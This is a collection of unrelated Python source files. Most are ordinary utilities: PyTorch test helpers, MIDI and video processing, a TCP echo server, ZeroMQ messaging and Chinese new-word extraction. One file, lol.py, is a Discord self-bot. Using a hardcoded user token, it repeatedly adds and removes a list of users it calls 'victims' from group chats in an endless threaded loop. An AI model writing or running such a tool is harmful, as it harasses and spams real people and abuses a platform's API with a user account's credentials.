# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
# forward-mode AD are tested by default. We create this wrapper because we'd like to keep new checks
# to be disabled to default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "OFF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default values override arguments explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
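# Illustrative usage sketch (hypothetical helper): the wrapper above turns on
# check_batched_grad and fast_mode by default, so a typical call only supplies
# double-precision inputs with requires_grad set.
def _example_gradcheck():
    x = torch.randn(3, dtype=torch.double, requires_grad=True)
    return gradcheck(torch.sin, (x,))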
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "OFF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default values override arguments explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
def _wrap_warn_once(regex):
def decorator(fn):
def inner(self, *args, **kwargs):
with self.assertWarnsOnceRegex(UserWarning, regex):
fn(self, *args, **kwargs)
return inner
return decorator
# This is a wrapper that wraps a test to run this test twice, one with
# coalesced=True, another with coalesced=False for coalesced/uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
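# Illustrative sketch (hypothetical test body): a test decorated with
# @coalescedonoff receives an extra `coalesced` keyword and runs twice; the
# flag is typically forwarded into genSparseTensor as is_uncoalesced.
@coalescedonoff
def _example_sparse_roundtrip(self, coalesced):
    x, _, _ = self.genSparseTensor((4, 4), 2, 3, not coalesced,
                                   device='cpu', dtype=torch.double)
    self.assertEqual(self.safeToDense(x), x.to_dense())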
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
# return the shared library file in the installed folder if exist,
# else the file in the build folder
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
Similar to unittest.skip; however, in the sandcastle environment it just
"passes" the test instead, to avoid creating tasks that complain about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
# Returns scalar tensor representation of a list of integer byte values
def bytes_to_scalar(byte_list: List[int], dtype: torch.dtype, device: torch.device):
dtype_to_ctype: Dict[torch.dtype, Any] = {
torch.int8: ctypes.c_int8,
torch.uint8: ctypes.c_uint8,
torch.int16: ctypes.c_int16,
torch.int32: ctypes.c_int32,
torch.int64: ctypes.c_int64,
torch.bool: ctypes.c_bool,
torch.float32: ctypes.c_float,
torch.complex64: ctypes.c_float,
torch.float64: ctypes.c_double,
torch.complex128: ctypes.c_double,
}
ctype = dtype_to_ctype[dtype]
num_bytes = ctypes.sizeof(ctype)
def check_bytes(byte_list):
for byte in byte_list:
assert 0 <= byte <= 255
if dtype.is_complex:
assert len(byte_list) == (num_bytes * 2)
check_bytes(byte_list)
real = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[:num_bytes])).value
imag = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[num_bytes:])).value
res = real + 1j * imag
else:
assert len(byte_list) == num_bytes
check_bytes(byte_list)
res = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list)).value
return torch.tensor(res, device=device, dtype=dtype)
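# Worked example (illustrative, hypothetical helper): on a little-endian
# machine the IEEE-754 float32 encoding of 1.0 is 0x3f800000, i.e. the byte
# sequence [0x00, 0x00, 0x80, 0x3f], so the call below returns tensor(1.).
def _bytes_to_scalar_example():
    return bytes_to_scalar([0x00, 0x00, 0x80, 0x3f], torch.float32,
                           torch.device('cpu'))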
def has_breakpad():
# We always build with breakpad in CI
if IS_IN_CI:
return True
# If not on a special build, check that the library was actually linked in
try:
torch._C._get_minidump_directory() # type: ignore[attr-defined]
return True
except RuntimeError as e:
if "Minidump handler is uninintialized" in str(e):
return True
return False
def sandcastle_skip_if(condition, reason):
"""
Similar to unittest.skipIf; however, in the sandcastle environment it just
"passes" the test instead, to avoid creating tasks that complain about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE and condition:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
if condition and IS_SANDCASTLE:
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
else:
return func(*args, **kwargs)
return wrapper
return decorator
def dtype_name(dtype):
""" Returns the pretty name of the dtype (e.g. torch.int64 -> int64). """
return str(dtype).split('.')[1]
def set_single_threaded_if_parallel_tbb(fn):
"""Set test to be single threaded for parallel tbb.
See https://github.com/pytorch/pytorch/issues/64571#issuecomment-914691883
"""
if not IS_TBB:
return fn
@wraps(fn)
def wrap_fn(*args, **kwargs):
num_threads = torch.get_num_threads()
torch.set_num_threads(1)
try:
return fn(*args, **kwargs)
finally:
torch.set_num_threads(num_threads)
return wrap_fn
@functools.lru_cache()
def get_cycles_per_ms() -> float:
"""Measure and return approximate number of cycles per millisecond for torch.cuda._sleep
"""
def measure() -> float:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
cycles_per_ms = 1000000 / start.elapsed_time(end)
return cycles_per_ms
# Get 10 values and remove the 2 max and 2 min and return the avg.
# This is to avoid system disturbances that skew the results, e.g.
# the very first cuda call likely does a bunch of init, which takes
# much longer than subsequent calls.
#
# Tested on both Tesla V100, Quadro GP100, Titan RTX, RTX 3090 GPUs
# and seems to return stable values. Therefore, we enable caching
# using lru_cache decorator above.
num = 10
vals = []
for _ in range(num):
vals.append(measure())
vals = sorted(vals)
return mean(vals[2 : num - 2])
T = TypeVar('T')
def first_sample(self: unittest.TestCase, samples: Iterable[T]) -> T:
"""
Returns the first sample from an iterable of samples, like those returned by OpInfo.
The test will be skipped if no samples are available.
"""
try:
return next(iter(samples))
except StopIteration:
raise unittest.SkipTest('Skipped! Need at least 1 sample input')
|
aseqdump_test.py
|
import aseqdump
import threading
data = 0
Ch = 0
def Note():
midi = aseqdump.aseqdump("24:0")
while 1:
onoff,key,velocity = midi.Note_get()
if(onoff == ""):
continue
print("Note: %s , %s , %s" % (onoff,key,velocity))
def Control():
global Ch
midi = aseqdump.aseqdump("24:2")
while 1:
Ch,value = midi.Control_get()
if(Ch == ""):
continue
print("Control: %s , %s" % (Ch,value))
def Pitch():
midi = aseqdump.aseqdump("24:1")
while 1:
Ch,value = midi.Pitch_get()
if(Ch == ""):
continue
print("Pitch: %s , %s" % (Ch,value))
thread_1 = threading.Thread(target=Note)
thread_1.start()
"""
thread_2 = threading.Thread(target=Control)
thread_2.start()
thread_3 = threading.Thread(target=Pitch)
thread_3.start()
"""
# Keep the main thread alive while the reader thread runs (avoids a busy loop).
thread_1.join()
#print("0x%04X" % data)
#midi2 = aseqdump.aseqdump("24:2")
#Ch,value = midi2.Control_get()
#print("Control2: %s , %s " % (Ch,value))
|
lol.py
|
import requests, threading
from discord.ext import commands
client = commands.Bot(command_prefix=".", self_bot= True)
token = "token.YXvmcw.yuh-qvd6bsDfyb4gY"
users = ['811042929040687177','903621585053835275','791835116980666418','903244322181361755'] #users aka the victims
gcs = ['904174831707250750','904174832642568273','904174835285000262','904174878138204240','904174879862042624','904174881200041985','903624652549672980','903624649777233961','904120310272491530']
# gc ids ^^^^^ for inviting and kicking out
#t = input("threads: ")
#gc = int(input("gc you wanna fuck them in: "))
def login(): #making it automated i'll finish it up in the future
data = {}
@client.event
async def on_ready():
data['friendsID'] = [freind.id for freind in client.user.friends]
data['channelsID'] = [channel.id for channel in client.private_channels]
await client.close()
try:
client.run(token)
except Exception as error:
print(f"Incorrect Token", error)
return None
return data
def add(i2):
for i in users:
headers = {"Authorization": token}
r = requests.put(f'https://discordapp.com/api/v6/channels/{i2}/recipients/{i}', headers=headers)
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"added {i} to gc {i2}")
elif r.status_code == 429:
print(f"ratelimited")
def remove(i2):
for i in users:
headers = {"Authorization": token}
r = requests.delete(f'https://discordapp.com/api/v6/channels/{i2}/recipients/{i}', headers=headers)
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"removed {i} from gc {i2}")
elif r.status_code == 429:
print(f"ratelimited")
def creategc(): #gc create for ur victims
for i in users:
headers = {"Authorization": token}
json = {"recipients":['811042929040687177','903621585053835275','791835116980666418','903244322181361755']}
r = requests.post('https://discordapp.com/api/v6/users/@me/channels', headers=headers, json=json)
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"created gc")
elif r.status_code == 429:
print(f"ratelimited")
while True:
try:
for i2 in gcs:
threading.Thread(target=remove, args=(i2,)).start()
threading.Thread(target=add, args=(i2,)).start()
except:
print("process couldn't start")
|
echo-server-tcp.py
|
from __future__ import print_function
import os
import sys
import signal
import threading
import pyuv
if sys.version_info >= (3, 0):
LINESEP = os.linesep.encode()
else:
LINESEP = os.linesep
def on_read(client, data, error):
if data is None:
client.close()
clients.remove(client)
return
data = data.strip()
if not data:
return
client.write(data+LINESEP)
def on_connection(server, error):
client = pyuv.TCP(server.loop)
server.accept(client)
clients.append(client)
client.start_read(on_read)
def async_exit(async_handle):
    # `async` became a reserved keyword in Python 3.7, so the handle is named
    # async_handle here.
    for c in clients:
        c.close()
    async_handle.close()
    signal_h.close()
    server.close()
def signal_cb(handle, signum):
    async_handle.send()
print("PyUV version %s" % pyuv.__version__)
loop = pyuv.Loop.default_loop()
async_handle = pyuv.Async(loop, async_exit)
clients = []
server = pyuv.TCP(loop)
server.bind(("0.0.0.0", 1234))
server.listen(on_connection)
signal_h = pyuv.Signal(loop)
signal_h.start(signal_cb, signal.SIGINT)
t = threading.Thread(target=loop.run)
t.start()
t.join()
print("Stopped!")
|
partial_converter.py
|
import json
import os
import sys
from multiprocessing import Process
import cv2
import matplotlib.pyplot as plt
import numpy as np
import py_midicsv as pm
sys.path.append('.')
from core import youtube2frames, frames2matrix, matrix2csv
def show_image(path):
image = cv2.imread(path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
plt.imshow(image)
plt.show()
def show_frames(frame_dir, n_f):
index = int(n_f / 128)
while True:
p = Process(target=show_image, args=(f"{frame_dir}/frame_{index}.jpg",))
p.start()
ans = input(f"Does this frame ({index}) contain enough info? (Y/N): ")
if ans.lower() == 'y':
return
else:
index += int(n_f / 128)
def write_lines(file_name, lines):
    # Overwrite the file with the given lines.
    with open(file_name, 'w') as file:
        for line in lines:
            file.write(line)
def prompt(variable_name: str, default):
    value = input(f"[Default: {default}] Enter the {variable_name.replace('_', ' ')}: ")
    # Fall back to the default when the user enters nothing (or only whitespace).
    return value if value.strip() else default
def partial_convert(
video_name=None,
video_url=None,
tag=None,
first_note=None,
first_white_note_col=None,
tenth_white_note_col=None,
read_height=None,
left_hand_color=None,
right_hand_color=None,
background_color=None,
minimum_note_width=None,
video_dir_path=None,
frame_dir_path=None,
array_dir_path=None,
csv_dir_path=None,
midi_dir_path=None,
):
if None in locals().values():
print("Click enter to use default values.")
if video_name is None:
video_name = prompt('video_name', 'video name')
if video_url is None:
video_url = input("[No default] Enter the video url: ")
if video_dir_path is None:
video_dir_path = prompt('video_dir_path', f'./{video_name}')
if frame_dir_path is None:
frame_dir_path = prompt('frame_dir_path', f'./{video_name}/frames')
os.makedirs(video_dir_path, exist_ok=True)
print(f'Created the following directory: {video_dir_path}')
num_frames, fps = youtube2frames.get_frames(
video_url=video_url,
video_name=video_name,
video_dir_path=video_dir_path,
frame_dir_path=frame_dir_path,
tag=tag
)
if None in [first_note, first_white_note_col, tenth_white_note_col, read_height,
left_hand_color, right_hand_color, background_color, minimum_note_width]:
show_frames(frame_dir_path, num_frames)
if first_note is None:
first_note = prompt('first_note (capital)', 'A')
if first_white_note_col is None:
first_white_note_col = float(input("[No default] Enter the first white note column: "))
if tenth_white_note_col is None:
tenth_white_note_col = float(input("[No default] Enter the tenth white note column: "))
if read_height is None:
read_height = int(prompt('read_height', 50))
if left_hand_color is None:
left_hand_color = json.loads(input("Enter the left hand note's color in [R, G, B]: "))
if right_hand_color is None:
right_hand_color = json.loads(input("Enter the right hand note's color in [R, G, B]: "))
if background_color is None:
background_color = json.loads(input("Enter the background color in [R, G, B]: "))
if minimum_note_width is None:
minimum_note_width = int(input("Enter the minimum note width: "))
left_hand, right_hand = frames2matrix.Frames2MatrixConverter(
name=video_name,
frame_dir=frame_dir_path,
num_frames=num_frames,
read_height=read_height,
first_note=first_note,
first_white_note_col=first_white_note_col,
tenth_white_note_col=tenth_white_note_col,
left_hand_color=left_hand_color,
right_hand_color=right_hand_color,
background_color=background_color,
minimum_note_width=minimum_note_width
).convert()
if array_dir_path is None:
array_dir_path = prompt('array_dir_path', f'./{video_name}/arrays')
os.makedirs(array_dir_path, exist_ok=True)
print(f'Created the following directory: {array_dir_path}')
np.save(f'{array_dir_path}/left_hand.npy', left_hand)
np.save(f'{array_dir_path}/right_hand.npy', right_hand)
full_csv_lines, right_csv_lines, left_csv_lines = matrix2csv.matrix_to_csv(left_hand, right_hand, fps)
if csv_dir_path is None:
csv_dir_path = prompt('csv_dir_path', f'./{video_name}/csvs')
os.makedirs(csv_dir_path, exist_ok=True)
print(f'Created the following directory: {csv_dir_path}')
write_lines(f'{csv_dir_path}/{video_name}.csv', full_csv_lines)
write_lines(f'{csv_dir_path}/{video_name}_rh.csv', right_csv_lines)
write_lines(f'{csv_dir_path}/{video_name}_lh.csv', left_csv_lines)
if midi_dir_path is None:
midi_dir_path = prompt('midi_dir_path', f'./{video_name}')
os.makedirs(midi_dir_path, exist_ok=True)
print(f'Created the following directory: {midi_dir_path}')
    # Parse the CSVs into MIDI files, then save the parsed MIDI files
with open(f"{midi_dir_path}/{video_name}.mid", "wb") as output_file:
midi_object = pm.csv_to_midi(f'{csv_dir_path}/{video_name}.csv')
pm.FileWriter(output_file).write(midi_object)
with open(f"{midi_dir_path}/{video_name}_rh.mid", "wb") as output_file:
midi_object = pm.csv_to_midi(f'{csv_dir_path}/{video_name}_rh.csv')
pm.FileWriter(output_file).write(midi_object)
with open(f"{midi_dir_path}/{video_name}_lh.mid", "wb") as output_file:
midi_object = pm.csv_to_midi(f'{csv_dir_path}/{video_name}_lh.csv')
pm.FileWriter(output_file).write(midi_object)
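# --- Added usage sketch (illustration only, not part of the original module) ---
# Any argument left as None is prompted for interactively; the values below
# (URL, colours, column positions) are placeholders and depend on the video.
if __name__ == '__main__':
    partial_convert(
        video_name='example',
        video_url='https://www.youtube.com/watch?v=PLACEHOLDER',
        first_note='A',
        first_white_note_col=10.0,
        tenth_white_note_col=250.0,
        read_height=50,
        left_hand_color=[0, 255, 0],
        right_hand_color=[255, 128, 0],
        background_color=[0, 0, 0],
        minimum_note_width=5,
    )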
|
__main__.py
|
from multiprocessing import Process
import os
import zmq
import time
def subscriber(pub_sub_addr):
context = zmq.Context()
sub_socket = context.socket(zmq.SUB)
sub_socket.connect(pub_sub_addr)
    # subscribe to everything; without a SUBSCRIBE filter the SUB socket delivers nothing
sub_socket.setsockopt(zmq.SUBSCRIBE, b"")
try:
while True:
item = sub_socket.recv_pyobj()
if item == None:
return
else:
print(f"Subscriber {os.getpid()}: {item}")
except KeyboardInterrupt:
pass
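# --- Added note (illustration only, not part of the original example) ---
# SUBSCRIBE is a byte-prefix filter. This example subscribes to everything (b"")
# because the payloads are pickled objects; with plain byte frames a subscriber
# could filter by topic prefix instead, e.g.:
#   sub_socket.setsockopt(zmq.SUBSCRIBE, b"sensor.")  # deliver only "sensor.*"
#   pub_socket.send(b"sensor.temp 21.5")              # delivered
#   pub_socket.send(b"log.debug starting")            # dropped by the filter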
def publisher(pull_addr, pub_addr):
context = zmq.Context()
# pull
pull_socket = context.socket(zmq.PULL)
pull_socket.bind(pull_addr)
# push
pub_socket = context.socket(zmq.PUB)
pub_socket.bind(pub_addr)
try:
while True:
item = pull_socket.recv_pyobj()
if item == None:
break
else:
print(f"Publishing: {item}")
pub_socket.send_pyobj(item)
except KeyboardInterrupt:
pass
pub_socket.send_pyobj(None)
if __name__ == "__main__":
context = zmq.Context()
fan_in_addr = "ipc://./.push_pull.ipc"
pub_sub_addr = "ipc://./.pub_sub.ipc"
    # start all SUB sockets before the PUB so they do not miss early messages (the "slow joiner" issue)
subs = [Process(target=subscriber, args=(pub_sub_addr,)) for _ in range(4)]
for s in subs:
s.start()
p = Process(target=publisher, args=(fan_in_addr, pub_sub_addr))
p.start()
push_socket = context.socket(zmq.PUSH)
push_socket.connect(fan_in_addr)
try:
while True:
time.sleep(0.2)
cmd = input(">>> ")
if cmd == "exit":
break
push_socket.send_pyobj(cmd)
except KeyboardInterrupt:
pass
push_socket.send_pyobj(None)
p.join()
for s in subs:
s.join()
|
ThreadNeologism.py
|
#!/usr/bin/python3.7
# -*- coding: utf-8 -*-
# @Time : 2018/2/28 10:58
# @Email : jtyoui@qq.com
# @Software: PyCharm
import math
import re
from threading import Thread
import queue
ALL_WORDS = dict()
All_LENS = 0
class Neologism(Thread):
def __init__(self, q, split_num=4):
Thread.__init__(self)
self.queue = q
self.split_num = split_num
def run(self):
while True:
try:
line = self.queue.get_nowait()
self.read_string(line)
self.queue.task_done()
except queue.Empty:
return
    def read_string(self, st, split_seq='[,。!?:]'):
        """Split the string into clauses using the split_seq pattern
        :param st: the input string
        :param split_seq: regular expression used for splitting
        """
ls = re.split(split_seq, st)
self.read_ls(ls=ls)
    def read_ls(self, ls):
        """Consume a list of clause strings
        :param ls: the list of strings
        """
global All_LENS
for word in ls:
All_LENS += len(word)
clean_data, lens = clean(data=word)
if lens > 2:
self.split(clean_data, lens)
    def split(self, words, lens):
        """Split the text into candidate words of at most split_num characters and record them in the dict as
        [count, frequency, cohesion, freedom, left neighbours of the key, right neighbours of the key] (used for the entropy measures)
        """
global ALL_WORDS
for i in range(0, lens):
for j in range(1, self.split_num + 1):
if i + j < lens:
key = words[i:i + j]
word = ALL_WORDS.get(key)
if word:
word[0] += 1
word[4].append(words[i - 1])
word[5].append(words[i + j])
else:
ALL_WORDS[key] = [1, 0.0, 1, 0, [words[i - 1]], [words[i + j]]]
def statistics(key_list):  # compute the frequency of every word
for key in key_list:
ALL_WORDS[key][1] = ALL_WORDS[key][0] / All_LENS
def handle(key_list):
    """Process the data:
    compute, for each key, the frequencies of its first-character and last-character splits,
    take the smaller of the left-neighbour and right-neighbour entropies,
    and store the resulting cohesion and freedom scores.
    """
    for key in key_list:
        word_list = ALL_WORDS[key]  # stats list for this word
        if len(key) == 1:
            continue
        end_all = front_all = 0.0
        left = word_list[1] / (ALL_WORDS[key[0]][1] * ALL_WORDS[key[1:]][1])  # frequency ratio of the first-character split
        right = word_list[1] / (ALL_WORDS[key[-1]][1] * ALL_WORDS[key[:-1]][1])  # frequency ratio of the last-character split
        for front in word_list[4]:
            if ALL_WORDS.get(front):
                front_all -= math.log(ALL_WORDS[front][1]) * ALL_WORDS[front][1]  # left-neighbour entropy
        for end in word_list[5]:
            if ALL_WORDS.get(end):
                end_all -= math.log(ALL_WORDS[end][1]) * ALL_WORDS[end][1]  # right-neighbour entropy
        # compare the two split frequencies: the smaller one bounds how tightly the word sticks together
        word_list[2] = left if left < right else right
        # compare the left and right neighbour entropies: the smaller one bounds how freely the word is used
        word_list[3] = front_all if front_all < end_all else end_all
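# --- Added note (illustration only, not part of the original file) ---
# For a candidate word w = c1..cn the scores computed above are, informally,
#   cohesion(w) = min( P(w) / (P(c1) * P(c2..cn)),  P(w) / (P(cn) * P(c1..c(n-1))) )
#   freedom(w)  = min( sum over recorded left neighbours c of -P(c)*log(P(c)),
#                      the same sum over the right neighbours )
# where P(.) is the frequency stored in ALL_WORDS by split() and statistics().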
def filter_words(frequency, cond, free, flag):
    """Filter out unimportant entries
    [count, frequency, cohesion, freedom]
    :param frequency: frequency threshold
    :param cond: cohesion threshold
    :param free: freedom threshold
    :param flag: True keeps a word only if all thresholds pass (AND); False keeps it if any one passes (OR, the default)
    :return: the filtered dict of words
    """
key_words = dict()
for key in ALL_WORDS.keys():
if len(key) <= 1:
continue
one_word = ALL_WORDS[key]
if flag:
if one_word[1] > frequency and one_word[2] > cond and one_word[3] > free:
key_words[key] = [one_word[0], one_word[1], one_word[2], one_word[3]]
else:
if one_word[1] > frequency or one_word[2] > cond or one_word[3] > free:
key_words[key] = [one_word[0], one_word[1], one_word[2], one_word[3]]
return key_words
def read_file(file, file_encoding='utf-8'):
    """Read the file contents; the file should be UTF-8 encoded without a BOM
    :param file: the file to read
    :param file_encoding: text encoding
    """
queues = queue.Queue(maxsize=0)
with open(file, encoding=file_encoding) as fp:
for line in fp:
queues.put(line)
return queues
def clean(data):
    # remove non-Chinese characters (keep only CJK code points)
words = [work for work in data if 19968 < ord(work) < 40959]
return ''.join(words), len(words)
def thread_analysis(file, thread_num=10, split_num=4, frequency=0.0001, cond=10, free=0.1, flag=False):
    """Run the analysis with multiple threads
    :param file: text file to analyse
    :param thread_num: number of reader threads
    :param split_num: maximum number of characters to match
    :param frequency: frequency threshold
    :param cond: cohesion threshold
    :param free: freedom threshold
    :param flag: True requires all thresholds to pass (AND); False keeps entries passing any one (OR, the default)
    :return: the dict of analysed words
    """
queues = read_file(file)
neologisms = [Neologism(split_num=split_num, q=queues) for _ in range(thread_num)]
for neologism in neologisms:
neologism.start()
queues.join()
keys_list = list(ALL_WORDS.keys())
size = len(keys_list) // split_num + 1
print("开始统计频率.........")
thread_open(split_num, statistics, keys_list, size)
print("开始处理数据.........")
thread_open(split_num, handle, keys_list, size)
print("开始过滤数据.........")
return filter_words(frequency, cond, free, flag)
def thread_open(split_num, target, keys_list, size):
    """Start worker threads
    :param split_num: number of threads
    :param target: callable run by each thread
    :param keys_list: list of all word keys
    :param size: chunk size handled by each thread
    """
threads = []
for i in range(split_num):
t = Thread(target=target, args=(keys_list[i * size:(i + 1) * size],))
threads.append(t)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
neologism_words = thread_analysis(file='小时代.txt', thread_num=10, frequency=0.00001, split_num=8, cond=100,
flag=True)
for k, v in neologism_words.items():
print('key:{0} count:{1} frequency:{2} cond:{3} free:{4}'.format(k, v[0], v[1], v[2], v[3]))
|
VideoStream.py
|
# To make python 2 and python 3 compatible code
from __future__ import absolute_import
from threading import Thread
import time
import sys
# OpenCV is imported the same way on Python 2 and Python 3
import cv2
# from cv2 import cv2
# import the Queue class from Python 3
if sys.version_info >= (3, 0):
from queue import Queue
# otherwise, import the Queue class for Python 2.7
else:
from Queue import Queue
# This class reads video frames in a separate thread and keeps only the latest significantly-changed frame in its queue, to be grabbed by another thread
class VideoStream(object):
def __init__(self, path, queueSize=3):
print('opening camera')
self.stream = cv2.VideoCapture(path)
# self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
# self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
# self.stream.set(cv2.CAP_PROP_SETTINGS, 1 )
self.stopped = False
self.Q = Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
previousFrame = None
previousDiff = 0
delta = 0
skippedFrames = 0
queuedFrames = 0
try:
while True:
if self.stopped:
return
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
if previousFrame is None:
previousFrame = frame
continue
difference = cv2.subtract(frame, previousFrame)
b, g, r = cv2.split(difference)
diff = cv2.countNonZero(b) + cv2.countNonZero(g) + cv2.countNonZero(r)
delta = abs(diff - previousDiff)
if delta > 80000:
# Clean the queue
while not self.Q.empty():
self.Q.get()
self.Q.put(frame)
queuedFrames = queuedFrames + 1
previousFrame = frame
previousDiff = diff
else:
skippedFrames = skippedFrames + 1
time.sleep(0.15)
except Exception as e:
print("got error: "+str(e))
def read(self):
return self.Q.get(block=True)
def more(self):
return self.Q.qsize() > 0
def stop(self):
self.stopped = True
def __exit__(self, exception_type, exception_value, traceback):
self.stream.release()
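# --- Added usage sketch (illustration only, not part of the original class) ---
# Assumes an OpenCV-readable source: a webcam index (0) or a file/RTSP path.
# read() blocks until the background thread queues a sufficiently changed frame.
if __name__ == '__main__':
    vs = VideoStream(0).start()
    try:
        while True:
            frame = vs.read()
            cv2.imshow('VideoStream demo', frame)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                break
    finally:
        vs.stop()
        cv2.destroyAllWindows()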
|
prepare_data.py
|
import sys
sys.path.insert(0, '../')
import os
import errno
from collections import Counter
from setup.settings import preprocessing
from core.tokenizer import tokenize
from core.sentence import score_answers, replace_in_answers
from tqdm import tqdm
from itertools import zip_longest
from multiprocessing import Pool
from threading import Thread
import time
# Files to be prepared
# files = {
# 'train.from': {'amount': 1, 'up_to': -1}, # copy all of data (up to "samples")
# 'tst2012.from': {'amount': .1, 'up_to': preprocessing['test_size']}, # copy 1/10th but up to 'test_size'
# 'tst2013.from': {'amount': .1, 'up_to': preprocessing['test_size']},
# 'train.to': {'amount': 1, 'up_to': -1},
# 'tst2012.to': {'amount': .1, 'up_to': preprocessing['test_size']},
# 'tst2013.to': {'amount': .1, 'up_to': preprocessing['test_size']},
# }
files = {
'train.from': {'amount': 1, 'up_to': -1},
'train.to': {'amount': 1, 'up_to': -1}
}
vocab = Counter([])
# Prepare all files
def prepare():
global vocab
print("\nPreparing training set from raw set")
# Ensure that destination folder exists
try:
os.makedirs(preprocessing['train_folder'])
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Iterate thru files and prepare them
for file_name, amounts in files.items():
vocab = Counter([])
print("\nFile: {} (iteration = 10k lines)".format(file_name))
# Output file handler
out_file = open('{}/{}'.format(preprocessing['train_folder'], file_name), 'w', encoding='utf-8',
buffering=131072)
# Maximum number of lines
read = 0
amount = int(min(amounts['amount'] * preprocessing['samples'] if preprocessing['samples'] > 0 else 10 ** 20,
amounts['up_to'] if amounts['up_to'] > 0 else 10 ** 20))
# Prepare thread variables
write_thread = None
vocab_thread1 = None
vocab_thread2 = None
# We are going to use multiprocessing for tokenization, as it's cpu intensive
with Pool(processes=preprocessing['cpu_count']) as pool:
# Open input file
with open('{}/{}'.format(preprocessing['source_folder'], file_name), 'r', encoding='utf-8',
buffering=131072) as in_file:
# Iterate every 10k lines
for rows in tqdm(read_lines(in_file, 10000, '')):
# Process using multiprocessing
rows = pool.map_async(tokenize, rows, 100).get()
# Join running threads from previous loop
if write_thread is not None:
write_thread.join()
vocab_thread1.join()
vocab_thread2.join()
                    # If the number of lines read exceeds the limit, or we hit EOF - break
                    # We leave before the last save as the last batch must be handled differently:
                    # zip_longest in read_lines pads the batch with empty lines up to the batch size,
                    # and we need to remove them - but only for the last batch, not for every batch
read += len(rows)
if read >= amount:
rows = rows[:amount-read+len(rows)]
break
assert len(rows) == 10000
# We are going to process vocab in two threads - a bit faster than one and we need shared memory
# Also multiprocessing is slower here
vocab_thread1 = Thread(target=append_vocab, args=(rows, 1))
vocab_thread1.start()
vocab_thread2 = Thread(target=append_vocab, args=(rows, 2))
vocab_thread2.start()
                    # And a thread for saving the tokenized data to the output file
write_thread = Thread(target=write_lines, args=(out_file, rows))
write_thread.start()
rows = []
# Last vocab parts and last lines to write
vocab_thread1 = Thread(target=append_vocab, args=(rows, 1))
vocab_thread1.start()
vocab_thread2 = Thread(target=append_vocab, args=(rows, 2))
vocab_thread2.start()
write_thread = Thread(target=write_lines, args=(out_file, rows))
write_thread.start()
vocab_thread1.join()
vocab_thread2.join()
write_thread.join()
